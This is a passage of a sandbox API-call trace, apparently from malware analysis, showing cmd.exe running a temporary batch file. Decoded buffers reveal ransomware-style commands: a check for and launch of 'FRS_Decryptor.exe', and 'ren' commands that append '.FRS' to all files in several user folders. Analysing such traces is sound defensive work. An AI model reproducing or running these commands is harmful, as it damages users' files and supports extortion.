dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0117.019] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0117.019] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0117.019] GetFileType (hFile=0x158) returned 0x1 [0117.019] _get_osfhandle (_FileHandle=3) returned 0x158 [0117.019] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0117.019] _tell (_FileHandle=3) returned 2627 [0117.020] _close (_FileHandle=3) returned 0 [0117.020] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0117.020] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0117.020] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0117.020] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0117.020] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0117.024] feof (_File=0x76ea4c68) returned 0 [0117.024] ferror (_File=0x76ea4c68) returned 0 [0117.024] fgets (in: _Buf=0xd822b8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0117.480] feof (_File=0x76ea4c68) returned 0 [0117.480] ferror (_File=0x76ea4c68) returned 0 [0117.480] fgets (in: _Buf=0xd83ef6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0117.544] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0117.545] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43466, cbMultiByte=78, lpWideCharStr=0xd43418, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0117.545] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0117.545] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0117.545] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0117.545] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0117.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.545] SetFilePointer (in: hFile=0x318, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0117.545] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.545] GetFileSize (in: hFile=0x318, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0117.546] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] GetFileType (hFile=0x318) returned 0x1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0117.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0117.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] GetFileType (hFile=0x318) returned 0x1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0117.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0117.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] GetFileType (hFile=0x318) returned 0x1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0117.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.546] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.546] GetFileType (hFile=0x318) returned 0x1 [0117.546] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.546] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0117.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0117.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.547] GetFileType (hFile=0x318) returned 0x1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0117.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0117.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0117.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.547] GetFileType (hFile=0x318) returned 0x1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0117.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0117.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0117.547] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.547] GetFileType (hFile=0x318) returned 0x1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0117.547] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0117.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0117.547] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0117.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.548] GetFileType (hFile=0x318) returned 0x1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0117.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0117.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0117.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.548] GetFileType (hFile=0x318) returned 0x1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0117.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0117.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0117.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.548] GetFileType (hFile=0x318) returned 0x1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0117.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0117.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0117.548] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.548] GetFileType (hFile=0x318) returned 0x1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0117.548] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0117.548] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0117.548] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0117.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.549] GetFileType (hFile=0x318) returned 0x1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0117.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0117.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0117.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.549] GetFileType (hFile=0x318) returned 0x1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0117.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0117.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0117.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.549] GetFileType (hFile=0x318) returned 0x1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0117.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0117.549] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0117.549] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.549] GetFileType (hFile=0x318) returned 0x1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0117.549] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x318, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0117.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0117.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.550] GetFileType (hFile=0x318) returned 0x1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0117.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0117.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0117.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.550] GetFileType (hFile=0x318) returned 0x1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0117.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0117.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0117.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.550] GetFileType (hFile=0x318) returned 0x1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0117.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0117.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0117.550] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.550] GetFileType (hFile=0x318) returned 0x1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0117.550] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0117.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0117.550] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0117.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.551] GetFileType (hFile=0x318) returned 0x1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0117.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0117.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0117.551] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.551] GetFileType (hFile=0x318) returned 0x1 [0117.551] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0117.551] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, 